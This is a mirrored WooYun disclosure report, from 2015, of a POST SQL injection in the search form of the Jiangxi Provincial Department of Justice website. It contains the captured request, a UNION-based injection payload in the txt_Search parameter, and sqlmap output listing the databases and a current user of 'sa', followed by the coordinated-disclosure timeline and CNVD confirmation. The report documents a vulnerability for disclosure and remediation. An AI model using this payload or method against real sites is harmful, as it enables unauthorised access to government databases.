乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-09-10: 细节已通知厂商并且等待厂商处理中 2015-09-11: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开 2015-09-21: 细节向核心白帽子及相关领域专家公开 2015-10-01: 细节向普通白帽子公开 2015-10-11: 细节向实习白帽子公开 2015-10-26: 细节向公众公开
江西省司法厅 搜索处存在POST注入漏洞 并为sa权限
POST /Browse/OnlineServer/DownLoad.aspx HTTP/1.1User-Agent: Opera/9.80 (Windows NT 6.1; Win64; x64) Presto/2.12.388 Version/12.17Host: **.**.**.**Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/webp, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflateReferer: http://**.**.**.**/Browse/OnlineServer/DownLoad.aspxCache-Control: no-cacheConnection: Keep-AliveContent-Length: 3588Content-Type: application/x-www-form-urlencoded__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUJOTMwNjI1MjQ1D2QWAgIBD2QWBgIDDxYCHgtfIUl0ZW1Db3VudAIZFjJmD2QWAmYPFQIn5b6L5biI5LqL5Yqh5omA5ZCN56ew6aKE5qC45YeG55Sz6K%2B36KGoFzIwMTUwMzI3MTAwNjMwODExMjUucmFyZAIBD2QWAmYPFQIt5b6L5biI5LqL5Yqh5omA57uE57uH5b2i5byP5Y%2BY5pu055Sz6K%2B355m76K6wFzIwMTQxMDMwMTA0MjU2NTE4NDcucmFyZAICD2QWAmYPFQIq6KGl5Y%2BR77yI5o2i5Y%2BR77yJ5b6L5biI5omn5Lia6K%2BB55Sz6K%2B36KGoFzIwMTQxMDMwMTA0MTQxNTQ0NzMucmFyZAIDD2QWAmYPFQIg5b6L5biI5qGj5qGI6LCD5Ye6KOWFpSnnlLPor7fooagXMjAxNDEwMzAxMDQwMjY3NDI2MC5yYXJkAgQPZBYCZg8VAiHlvovluIjlj5jmm7TmiafkuJrmnLrmnoTnlLPor7fooagXMjAxNDEwMzAxMDM5MTg2MTcyOC5yYXJkAgUPZBYCZg8VAg%2Flrp7kuaDpibTlrprkuaYXMjAxNDEwMzAxMDM4MTUyNDk5Ny5yYXJkAgYPZBYCZg8VAhXlvovluIjmiafkuJrmib%2For7rkuaYXMjAxNDEwMzAxMDM2NDkzNTYyMi5yYXJkAgcPZBYCZg8VAirkuK3ljY7kurrmsJHlhbHlkozlm73lvovluIjmiafkuJrnmbvorrDooagXMjAxNDEwMzAxMDM1NDkyMDI1Mi5yYXJkAggPZBYCZg8VAjnooaXlj5HvvIjmjaLlj5HvvInlvovluIjkuovliqHmiYDmiafkuJrorrjlj6%2For4HnlLPor7fooagXMjAxNDEwMzAxMDMyMzEzMzE3Ny5yYXJkAgkPZBYCZg8VAirlvovluIjkuovliqHmiYDkvY%2FmiYDlj5jmm7TlpIfmoYjlkYjmiqXooagXMjAxNDEwMzAxMDMxMzY0MTk2Ny5yYXJkAgoPZBYCZg8VAjnlvovluIjkuovliqHmiYDlkIjkvJnkurrlj5jmm7TvvIjpgIDlh7rvvInlpIfmoYjlkYjmiqXooagXMjAxNDEwMzAxMDMwMTkzNzExNC5yYXJkAgsPZBYCZg8VAjnlvovluIjkuovliqHmiYDlkIjkvJnkurrlj5jmm7TvvIjliqDlhaXvvInlpIfmoYjlkYjmiqXooagXMjAxNDEwMzAxMDI3NDM2NjcyNi5yYXJkAgwPZBYCZg8VAirlvovluIjkuovliqHmiYDlkIjkvJnljY%2Forq7lj5jmm7TnlLPor7fooagXMjAxNDEwMzAxMDI2MzU3NjAzNC5yYXJkAg0PZBYCZg8VAiTlvovluIjkuovliqHmiYDnq6DnqIvlj5jmm7TnlLPor7fooagXMjAxNDEwMzAxMDI1MjY4ODYyMi5yYXJkAg4PZBYCZg8VAiTlvovluIjkuovliqHmiYDlkI3np7Dlj5jmm7TnlLPor7fooagXMjAxNDEwMzAxMDI0MTAwNzE2OS5yYXJkAg8PZBYCZg8VAiflvovluIjkuovliqHmiYDotJ%2FotKPkurrlj5jmm7TnlLPor7fooagXMjAxNDEwMzAxMDIyNTcyNjYzNi5yYXJkAhAPZBYCZg8VAiTlvovluIjkuovliqHmiYDorr7nq4vnlLPor7fnmbvorrDooagXMjAxNDEwMzAxMDIxMzk0MjIyMi5yYXJkAhEPZBYCZg8VAirlvovluIjkuovliqHmiYDliIbmiYDorr7nq4vnlLPor7fnmbvorrDooagXMjAxNDEwMzAxMDE2NTYyOTczMy5yYXJkAhIPZBYCZg8VAiHms5XlvovogYzkuJrotYTmoLzosIPmoaPnlLPor7fkuaYXMjAxNDEwMjcxMDE1MzkzNjQ3My5yYXJkAhMPZBYCZg8VAirln7rlsYLms5XlvovmnI3liqHlt6XkvZzogIXmiafkuJrnmbvorrDooagXMjAxNDA5MTYxNTAxMzczNzIzOC56aXBkAhQPZBYCZg8VAh7lj7jms5XpibTlrprkurrnmbvorrDnlLPor7fooagXMjAxNDA5MTYxNTAxMjI5MjY2OS56aXBkAhUPZBYCZg8VAiHlj7jms5XpibTlrprmnLrmnoTnmbvorrDnlLPor7fooagXMjAxNDA5MTYxNTAxMTA5MzAyMS56aXBkAhYPZBYCZg8VAh7ku7Loo4Hlp5TlkZjkvJrnlLPor7fnmbvorrDooagXMjAxNDA5MTYxNTAwNTA3OTA0OS56aXBkAhcPZBYCZg8VAhvlhazor4HmnLrmnoTorr7nq4vmiqXlrqHooagXMjAxNDA5MTYxNTAwMzQzNzkxOC56aXBkAhgPZBYCZg8VAhXms5Xlvovmj7TliqnnlLPor7fooagXMjAxNDA5MTYxNTAwMjAwMTE0OS56aXBkAgQPDxYEHglUb3RhbFBhZ2VmHglQYWdlSW5kZXgCAWQWBgIBDxYCHglpbm5lcmh0bWwFATBkAgQPFgIfAwUBMWQCBQ8WAh8DBQExZAIFDxYCHwMF3AI8YnIgLz7nvZHnq5nnu7TmiqTvvJrmsZ%2Fopb%2FnnIHlj7jms5XljoXkv6Hmga%2FkuK3lv4Mg6LWjSUNQ5aSHMDUwMDY0ODflj7c8YnIgLz7lnLDlnYDvvJrmsZ%2Fopb%2FnnIHljZfmmIzluILnnIHmlL%2FlupzlpKfpmaLljZfkuIDot6845Y%2B3PGJyIC8%2B55S16K%2Bd77yaMDc5MS04NjIyMTYzMSAg5Lyg55yf77yaMDc5MS04NjIyMTc0MTxiciAvPumCrue8lu%2B8mjMzMDA0NiAgICAgIEVtYWls77yaanhzZkBqeHNmLmdvdi5jbjxiciAvPumakOengeWuieWFqOeUs%2BaYjiAmbmJzcDsmbmJzcDvniYjmnYPkv53miqTnlLPmmI48YnIvPuacrOe9keermemAgueUqElFNy4w5Lul5LiK54mI5pys5rWP6KeI5Zmo6K6%2F6ZeuPGJyLz5kGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQlidG5fU2VyY2gcDQ%2F8eFQz5GSbMqe1M6MRmjlpsg%3D%3D&__EVENTVALIDATION=%2FwEWCQLN9Iq6CgKTyPf7DQK%2FkdPzCALN46vwDQLVmMnSAQLpnfuOCAL5up6DBQLHxrikBQKv%2BOb%2BDi9ikKKo5WLBm0Hx947VCcNe0D9y&txt_Search=%E5%BE%8B%E5%B8%88%E4%BA%8B%E5%8A%A1%E6%89%80%E5%90%8D%E7%A7%B0%E9%A2%84%E6%A0%B8%E5%87%86%E7%94%B3%E8%AF%B7%E8%A1%A8&PageControl1%24txtPage=&btn_Serch.x=25&btn_Serch.y=13
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: POSTParameter: txt_Search Type: UNION query Title: Generic UNION query (NULL) - 4 columns Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUJOTMwNjI1MjQ1D2QWAgIBD2QWBgIDDxYCHgtfIUl0ZW1Db3VudGZkAgQPDxYEHglUb3RhbFBhZ2VmHglQYWdlSW5kZXgCAWQWBgIBDxYCHglpbm5lcmh0bWwFATBkAgQPFgIfAwUBMWQCBQ8WAh8DBQExZAIFDxYCHwMF3AI8YnIgLz7nvZHnq5nnu7TmiqTvvJrmsZ/opb/nnIHlj7jms5XljoXkv6Hmga/kuK3lv4Mg6LWjSUNQ5aSHMDUwMDY0ODflj7c8YnIgLz7lnLDlnYDvvJrmsZ/opb/nnIHljZfmmIzluILnnIHmlL/lupzlpKfpmaLljZfkuIDot6845Y+3PGJyIC8+55S16K+d77yaMDc5MS04NjIyMTYzMSAg5Lyg55yf77yaMDc5MS04NjIyMTc0MTxiciAvPumCrue8lu+8mjMzMDA0NiAgICAgIEVtYWls77yaanhzZkBqeHNmLmdvdi5jbjxiciAvPumakOengeWuieWFqOeUs+aYjiAmbmJzcDsmbmJzcDvniYjmnYPkv53miqTnlLPmmI48YnIvPuacrOe9keermemAgueUqElFNy4w5Lul5LiK54mI5pys5rWP6KeI5Zmo6K6/6ZeuPGJyLz5kGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQlidG5fU2VyY2jKDX318PymKpVZJBSWIkgG6hlEFQ==&__EVENTVALIDATION=/wEWCQLb1fffBAKTyPf7DQK/kdPzCALN46vwDQLVmMnSAQLpnfuOCAL5up6DBQLHxrikBQKv+Ob+DjwAHrZMJtyIbw2s1/VkcnzCaLgE&searchword=%E8%AF%B7%E8%BE%93%E5%85%A5%E5%85%B3%E9%94%AE%E5%AD%97%E6%90%9C%E7%B4%A2...&txt_Search=1' UNION ALL SELECT NULL,NULL,NULL,CHAR(113)+CHAR(114)+CHAR(119)+CHAR(116)+CHAR(113)+CHAR(68)+CHAR(119)+CHAR(66)+CHAR(66)+CHAR(113)+CHAR(72)+CHAR(107)+CHAR(71)+CHAR(110)+CHAR(108)+CHAR(113)+CHAR(103)+CHAR(104)+CHAR(116)+CHAR(113)-- &PageControl1$txtPage=&btn_Serch.x=22&btn_Serch.y=22---[10:18:37] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2008web application technology: Microsoft IIS 7.5, ASP.NET, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2008[10:18:37] [INFO] fetching database namesavailable databases [9]:[*] JX_GZDB_NET[*] JX_SendSMS[*] jxsfdb[*] master[*] model[*] msdb[*] ReportServer[*] ReportServerTempDB[*] tempdb
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: POSTParameter: txt_Search Type: UNION query Title: Generic UNION query (NULL) - 4 columns Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUJOTMwNjI1MjQ1D2QWAgIBD2QWBgIDDxYCHgtfIUl0ZW1Db3VudGZkAgQPDxYEHglUb3RhbFBhZ2VmHglQYWdlSW5kZXgCAWQWBgIBDxYCHglpbm5lcmh0bWwFATBkAgQPFgIfAwUBMWQCBQ8WAh8DBQExZAIFDxYCHwMF3AI8YnIgLz7nvZHnq5nnu7TmiqTvvJrmsZ/opb/nnIHlj7jms5XljoXkv6Hmga/kuK3lv4Mg6LWjSUNQ5aSHMDUwMDY0ODflj7c8YnIgLz7lnLDlnYDvvJrmsZ/opb/nnIHljZfmmIzluILnnIHmlL/lupzlpKfpmaLljZfkuIDot6845Y+3PGJyIC8+55S16K+d77yaMDc5MS04NjIyMTYzMSAg5Lyg55yf77yaMDc5MS04NjIyMTc0MTxiciAvPumCrue8lu+8mjMzMDA0NiAgICAgIEVtYWls77yaanhzZkBqeHNmLmdvdi5jbjxiciAvPumakOengeWuieWFqOeUs+aYjiAmbmJzcDsmbmJzcDvniYjmnYPkv53miqTnlLPmmI48YnIvPuacrOe9keermemAgueUqElFNy4w5Lul5LiK54mI5pys5rWP6KeI5Zmo6K6/6ZeuPGJyLz5kGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQlidG5fU2VyY2jKDX318PymKpVZJBSWIkgG6hlEFQ==&__EVENTVALIDATION=/wEWCQLb1fffBAKTyPf7DQK/kdPzCALN46vwDQLVmMnSAQLpnfuOCAL5up6DBQLHxrikBQKv+Ob+DjwAHrZMJtyIbw2s1/VkcnzCaLgE&searchword=%E8%AF%B7%E8%BE%93%E5%85%A5%E5%85%B3%E9%94%AE%E5%AD%97%E6%90%9C%E7%B4%A2...&txt_Search=1' UNION ALL SELECT NULL,NULL,NULL,CHAR(113)+CHAR(114)+CHAR(119)+CHAR(116)+CHAR(113)+CHAR(68)+CHAR(119)+CHAR(66)+CHAR(66)+CHAR(113)+CHAR(72)+CHAR(107)+CHAR(71)+CHAR(110)+CHAR(108)+CHAR(113)+CHAR(103)+CHAR(104)+CHAR(116)+CHAR(113)-- &PageControl1$txtPage=&btn_Serch.x=22&btn_Serch.y=22---[10:20:22] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2008web application technology: Microsoft IIS 7.5, ASP.NET, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2008[10:20:22] [INFO] fetching current usercurrent user: 'sa'
过滤
危害等级:高
漏洞Rank:10
确认时间:2015-09-11 13:39
CNVD确认并复现所述情况,已经转由CNCERT下发给江西分中心,由其后续协调网站管理单位处置。
暂无
